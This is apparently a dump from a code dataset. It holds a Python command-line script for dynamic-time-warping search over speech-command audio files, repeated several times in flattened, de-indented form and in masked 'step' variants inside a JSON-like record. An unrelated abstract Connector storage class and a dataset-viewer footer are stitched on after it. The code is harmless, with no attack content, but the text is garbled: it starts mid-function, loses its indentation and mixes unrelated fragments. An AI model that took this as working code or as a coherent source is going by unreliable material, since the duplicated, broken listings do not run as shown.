searchCode = searchFilename.split('_')[0]
if searchDirectory != currentDirectory:
currentDirectory = searchDirectory
if searchCode == queryCode:
if currentDirectory == queryDirectory:
expectations.append([[0, 1]])
else:
expectations.append([[0, 0]])
return expectations
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Dynamic Time Warping')
parser.add_argument('-g', '--graph', action='store_true', help=
'Enable graph display')
parser.add_argument('-t', '--threshold', type=float, default=0.4, help=
'Set score threshold')
parser.add_argument('query_path')
parser.add_argument('search_pattern_path')
printGroup = parser.add_mutually_exclusive_group()
printGroup.add_argument('-p', '--percentage', action='store_true', help
='Enable percentage display')
printGroup.add_argument('-v', '--verbose', action='store_true', help=
'Enable verbose display')
args = parser.parse_args()
GRAPH = args.graph
PERCENTAGE = args.percentage
threshold = args.threshold
VERBOSE = args.verbose
queryPath = args.query_path
searchPatternPath = args.search_pattern_path
dtw.VERBOSE = VERBOSE
stats.VERBOSE = VERBOSE
labels, sweepList, bestList = dtw.runSearch(queryPath, searchPatternPath)
results = dtw.computeResultsPrecisely(sweepList, threshold,
positiveOnly=True)
for i, result in enumerate(results):
print(labels[i] + ': ', end='')
for j, (hitIndex, _) in enumerate(result):
print(hitIndex * 3, end='')
if j < len(result) - 1:
print(' | ', end='')
print()
if GRAPH:
dtw.showSweeps(labels, sweepList, bestList)
plt.show()
<|reserved_special_token_1|>
import dtw
import stats
import glob
import argparse
import matplotlib.pyplot as plt
GRAPH = False
PERCENTAGE = False
VERBOSE = False
def buildExpectations(queryPath, searchPatternPath):
"""
Based on SpeechCommand_v0.02 directory structure.
"""
expectations = []
currentDirectory = ""
queryFilename = queryPath.split("/")[-1]
queryDirectory = queryPath.split("/")[-2]
queryCode = queryFilename.split("_")[0]
searchFileList = sorted(glob.glob(searchPatternPath))
for searchFile in searchFileList:
searchFilename = searchFile.split("/")[-1]
searchDirectory = searchFile.split("/")[-2]
searchCode = searchFilename.split("_")[0]
if searchDirectory != currentDirectory:
currentDirectory = searchDirectory
if searchCode == queryCode:
if currentDirectory == queryDirectory:
expectations.append([[0, 1]])
else:
expectations.append([[0, 0]])
return expectations
if __name__ == "__main__":
# Parse arguments
parser = argparse.ArgumentParser(description='Dynamic Time Warping')
parser.add_argument('-g', '--graph', action='store_true', help='Enable graph display')
parser.add_argument('-t', '--threshold', type=float, default=0.4, help='Set score threshold')
parser.add_argument('query_path')
parser.add_argument('search_pattern_path')
printGroup = parser.add_mutually_exclusive_group()
printGroup.add_argument('-p', '--percentage', action='store_true', help='Enable percentage display')
printGroup.add_argument('-v', '--verbose', action='store_true', help='Enable verbose display')
args = parser.parse_args()
GRAPH = args.graph
PERCENTAGE = args.percentage
threshold = args.threshold
VERBOSE = args.verbose
queryPath = args.query_path
searchPatternPath = args.search_pattern_path
dtw.VERBOSE = VERBOSE
stats.VERBOSE = VERBOSE
labels, sweepList, bestList = dtw.runSearch(queryPath, searchPatternPath)
results = dtw.computeResultsPrecisely(sweepList, threshold, positiveOnly=True)
for i, result in enumerate(results):
print(labels[i] + ": ", end='')
for j, (hitIndex, _) in enumerate(result):
print(hitIndex * 3, end='')
if j < len(result) - 1:
print(" | ", end='')
print()
if GRAPH:
dtw.showSweeps(labels, sweepList, bestList)
plt.show()
|
flexible
|
{
"blob_id": "03fb1cf0aac0c37858dd8163562a7139ed4e1179",
"index": 776,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef buildExpectations(queryPath, searchPatternPath):\n \"\"\"\n Based on SpeechCommand_v0.02 directory structure.\n \"\"\"\n expectations = []\n currentDirectory = ''\n queryFilename = queryPath.split('/')[-1]\n queryDirectory = queryPath.split('/')[-2]\n queryCode = queryFilename.split('_')[0]\n searchFileList = sorted(glob.glob(searchPatternPath))\n for searchFile in searchFileList:\n searchFilename = searchFile.split('/')[-1]\n searchDirectory = searchFile.split('/')[-2]\n searchCode = searchFilename.split('_')[0]\n if searchDirectory != currentDirectory:\n currentDirectory = searchDirectory\n if searchCode == queryCode:\n if currentDirectory == queryDirectory:\n expectations.append([[0, 1]])\n else:\n expectations.append([[0, 0]])\n return expectations\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Dynamic Time Warping')\n parser.add_argument('-g', '--graph', action='store_true', help=\n 'Enable graph display')\n parser.add_argument('-t', '--threshold', type=float, default=0.4, help=\n 'Set score threshold')\n parser.add_argument('query_path')\n parser.add_argument('search_pattern_path')\n printGroup = parser.add_mutually_exclusive_group()\n printGroup.add_argument('-p', '--percentage', action='store_true', help\n ='Enable percentage display')\n printGroup.add_argument('-v', '--verbose', action='store_true', help=\n 'Enable verbose display')\n args = parser.parse_args()\n GRAPH = args.graph\n PERCENTAGE = args.percentage\n threshold = args.threshold\n VERBOSE = args.verbose\n queryPath = args.query_path\n searchPatternPath = args.search_pattern_path\n dtw.VERBOSE = VERBOSE\n stats.VERBOSE = VERBOSE\n labels, sweepList, bestList = dtw.runSearch(queryPath, searchPatternPath)\n results = dtw.computeResultsPrecisely(sweepList, threshold,\n positiveOnly=True)\n for i, result in enumerate(results):\n print(labels[i] + ': ', end='')\n for j, (hitIndex, _) in enumerate(result):\n print(hitIndex * 3, end='')\n if j < len(result) - 1:\n print(' | ', end='')\n print()\n if GRAPH:\n dtw.showSweeps(labels, sweepList, bestList)\n plt.show()\n",
"step-3": "<mask token>\nGRAPH = False\nPERCENTAGE = False\nVERBOSE = False\n\n\ndef buildExpectations(queryPath, searchPatternPath):\n \"\"\"\n Based on SpeechCommand_v0.02 directory structure.\n \"\"\"\n expectations = []\n currentDirectory = ''\n queryFilename = queryPath.split('/')[-1]\n queryDirectory = queryPath.split('/')[-2]\n queryCode = queryFilename.split('_')[0]\n searchFileList = sorted(glob.glob(searchPatternPath))\n for searchFile in searchFileList:\n searchFilename = searchFile.split('/')[-1]\n searchDirectory = searchFile.split('/')[-2]\n searchCode = searchFilename.split('_')[0]\n if searchDirectory != currentDirectory:\n currentDirectory = searchDirectory\n if searchCode == queryCode:\n if currentDirectory == queryDirectory:\n expectations.append([[0, 1]])\n else:\n expectations.append([[0, 0]])\n return expectations\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Dynamic Time Warping')\n parser.add_argument('-g', '--graph', action='store_true', help=\n 'Enable graph display')\n parser.add_argument('-t', '--threshold', type=float, default=0.4, help=\n 'Set score threshold')\n parser.add_argument('query_path')\n parser.add_argument('search_pattern_path')\n printGroup = parser.add_mutually_exclusive_group()\n printGroup.add_argument('-p', '--percentage', action='store_true', help\n ='Enable percentage display')\n printGroup.add_argument('-v', '--verbose', action='store_true', help=\n 'Enable verbose display')\n args = parser.parse_args()\n GRAPH = args.graph\n PERCENTAGE = args.percentage\n threshold = args.threshold\n VERBOSE = args.verbose\n queryPath = args.query_path\n searchPatternPath = args.search_pattern_path\n dtw.VERBOSE = VERBOSE\n stats.VERBOSE = VERBOSE\n labels, sweepList, bestList = dtw.runSearch(queryPath, searchPatternPath)\n results = dtw.computeResultsPrecisely(sweepList, threshold,\n positiveOnly=True)\n for i, result in enumerate(results):\n print(labels[i] + ': ', end='')\n for j, (hitIndex, _) in enumerate(result):\n print(hitIndex * 3, end='')\n if j < len(result) - 1:\n print(' | ', end='')\n print()\n if GRAPH:\n dtw.showSweeps(labels, sweepList, bestList)\n plt.show()\n",
"step-4": "import dtw\nimport stats\nimport glob\nimport argparse\nimport matplotlib.pyplot as plt\nGRAPH = False\nPERCENTAGE = False\nVERBOSE = False\n\n\ndef buildExpectations(queryPath, searchPatternPath):\n \"\"\"\n Based on SpeechCommand_v0.02 directory structure.\n \"\"\"\n expectations = []\n currentDirectory = ''\n queryFilename = queryPath.split('/')[-1]\n queryDirectory = queryPath.split('/')[-2]\n queryCode = queryFilename.split('_')[0]\n searchFileList = sorted(glob.glob(searchPatternPath))\n for searchFile in searchFileList:\n searchFilename = searchFile.split('/')[-1]\n searchDirectory = searchFile.split('/')[-2]\n searchCode = searchFilename.split('_')[0]\n if searchDirectory != currentDirectory:\n currentDirectory = searchDirectory\n if searchCode == queryCode:\n if currentDirectory == queryDirectory:\n expectations.append([[0, 1]])\n else:\n expectations.append([[0, 0]])\n return expectations\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Dynamic Time Warping')\n parser.add_argument('-g', '--graph', action='store_true', help=\n 'Enable graph display')\n parser.add_argument('-t', '--threshold', type=float, default=0.4, help=\n 'Set score threshold')\n parser.add_argument('query_path')\n parser.add_argument('search_pattern_path')\n printGroup = parser.add_mutually_exclusive_group()\n printGroup.add_argument('-p', '--percentage', action='store_true', help\n ='Enable percentage display')\n printGroup.add_argument('-v', '--verbose', action='store_true', help=\n 'Enable verbose display')\n args = parser.parse_args()\n GRAPH = args.graph\n PERCENTAGE = args.percentage\n threshold = args.threshold\n VERBOSE = args.verbose\n queryPath = args.query_path\n searchPatternPath = args.search_pattern_path\n dtw.VERBOSE = VERBOSE\n stats.VERBOSE = VERBOSE\n labels, sweepList, bestList = dtw.runSearch(queryPath, searchPatternPath)\n results = dtw.computeResultsPrecisely(sweepList, threshold,\n positiveOnly=True)\n for i, result in enumerate(results):\n print(labels[i] + ': ', end='')\n for j, (hitIndex, _) in enumerate(result):\n print(hitIndex * 3, end='')\n if j < len(result) - 1:\n print(' | ', end='')\n print()\n if GRAPH:\n dtw.showSweeps(labels, sweepList, bestList)\n plt.show()\n",
"step-5": "import dtw\nimport stats\n\nimport glob\nimport argparse\nimport matplotlib.pyplot as plt\n\nGRAPH = False\nPERCENTAGE = False\nVERBOSE = False\n\ndef buildExpectations(queryPath, searchPatternPath):\n \"\"\"\n Based on SpeechCommand_v0.02 directory structure.\n \"\"\"\n expectations = []\n currentDirectory = \"\"\n queryFilename = queryPath.split(\"/\")[-1]\n queryDirectory = queryPath.split(\"/\")[-2]\n queryCode = queryFilename.split(\"_\")[0]\n searchFileList = sorted(glob.glob(searchPatternPath))\n for searchFile in searchFileList:\n searchFilename = searchFile.split(\"/\")[-1]\n searchDirectory = searchFile.split(\"/\")[-2]\n searchCode = searchFilename.split(\"_\")[0]\n if searchDirectory != currentDirectory:\n currentDirectory = searchDirectory\n if searchCode == queryCode:\n if currentDirectory == queryDirectory:\n expectations.append([[0, 1]])\n else:\n expectations.append([[0, 0]])\n return expectations\n\nif __name__ == \"__main__\":\n # Parse arguments\n parser = argparse.ArgumentParser(description='Dynamic Time Warping')\n parser.add_argument('-g', '--graph', action='store_true', help='Enable graph display')\n parser.add_argument('-t', '--threshold', type=float, default=0.4, help='Set score threshold')\n parser.add_argument('query_path')\n parser.add_argument('search_pattern_path')\n\n printGroup = parser.add_mutually_exclusive_group()\n printGroup.add_argument('-p', '--percentage', action='store_true', help='Enable percentage display')\n printGroup.add_argument('-v', '--verbose', action='store_true', help='Enable verbose display')\n\n args = parser.parse_args()\n\n GRAPH = args.graph\n PERCENTAGE = args.percentage\n threshold = args.threshold\n VERBOSE = args.verbose\n queryPath = args.query_path\n searchPatternPath = args.search_pattern_path\n\n dtw.VERBOSE = VERBOSE\n stats.VERBOSE = VERBOSE\n\n labels, sweepList, bestList = dtw.runSearch(queryPath, searchPatternPath)\n\n results = dtw.computeResultsPrecisely(sweepList, threshold, positiveOnly=True)\n for i, result in enumerate(results):\n print(labels[i] + \": \", end='')\n for j, (hitIndex, _) in enumerate(result):\n print(hitIndex * 3, end='')\n if j < len(result) - 1:\n print(\" | \", end='')\n print()\n\n if GRAPH:\n dtw.showSweeps(labels, sweepList, bestList)\n\n plt.show()\n",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
import abc
class Connector:
"""@abc.abstractmethod
def connect(self):
pass
"""
@abc.abstractmethod
def save(self, item):
pass
@abc.abstractmethod
def load_all(self):
pass
@abc.abstractmethod
def load_by_id(self, id):
pass
@abc.abstractmethod
def update_item(self, item):
pass
@abc.abstractmethod
def get_last_id(self):
pass
@abc.abstractmethod
def get_done_items(self):
pass
"""@abc.abstractmethod
def close(self):
pass"""
|
normal
|
{
"blob_id": "ac46aa6f8f4f01b6f3c48532533b9dd41a8a1c1c",
"index": 7007,
"step-1": "<mask token>\n\n\nclass Connector:\n <mask token>\n\n @abc.abstractmethod\n def save(self, item):\n pass\n\n @abc.abstractmethod\n def load_all(self):\n pass\n\n @abc.abstractmethod\n def load_by_id(self, id):\n pass\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass Connector:\n <mask token>\n\n @abc.abstractmethod\n def save(self, item):\n pass\n\n @abc.abstractmethod\n def load_all(self):\n pass\n\n @abc.abstractmethod\n def load_by_id(self, id):\n pass\n <mask token>\n\n @abc.abstractmethod\n def get_last_id(self):\n pass\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Connector:\n <mask token>\n\n @abc.abstractmethod\n def save(self, item):\n pass\n\n @abc.abstractmethod\n def load_all(self):\n pass\n\n @abc.abstractmethod\n def load_by_id(self, id):\n pass\n\n @abc.abstractmethod\n def update_item(self, item):\n pass\n\n @abc.abstractmethod\n def get_last_id(self):\n pass\n\n @abc.abstractmethod\n def get_done_items(self):\n pass\n <mask token>\n",
"step-4": "<mask token>\n\n\nclass Connector:\n \"\"\"@abc.abstractmethod\n def connect(self):\n pass\n \"\"\"\n\n @abc.abstractmethod\n def save(self, item):\n pass\n\n @abc.abstractmethod\n def load_all(self):\n pass\n\n @abc.abstractmethod\n def load_by_id(self, id):\n pass\n\n @abc.abstractmethod\n def update_item(self, item):\n pass\n\n @abc.abstractmethod\n def get_last_id(self):\n pass\n\n @abc.abstractmethod\n def get_done_items(self):\n pass\n \"\"\"@abc.abstractmethod\n def close(self):\n pass\"\"\"\n",
"step-5": "import abc\r\n\r\n\r\nclass Connector:\r\n\r\n\r\n \"\"\"@abc.abstractmethod\r\n def connect(self):\r\n pass\r\n \"\"\"\r\n \r\n @abc.abstractmethod\r\n def save(self, item):\r\n pass\r\n \r\n\r\n @abc.abstractmethod\r\n def load_all(self):\r\n pass\r\n \r\n \r\n @abc.abstractmethod\r\n def load_by_id(self, id):\r\n pass\r\n\r\n \r\n @abc.abstractmethod\r\n def update_item(self, item):\r\n pass\r\n\r\n\r\n @abc.abstractmethod\r\n def get_last_id(self):\r\n pass\r\n\r\n\r\n @abc.abstractmethod\r\n def get_done_items(self):\r\n pass \r\n \r\n \r\n \"\"\"@abc.abstractmethod\r\n def close(self):\r\n pass\"\"\"\r\n\r\n \r\n\r\n",
"step-ids": [
4,
5,
7,
8,
10
]
}
|
[
4,
5,
7,
8,
10
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.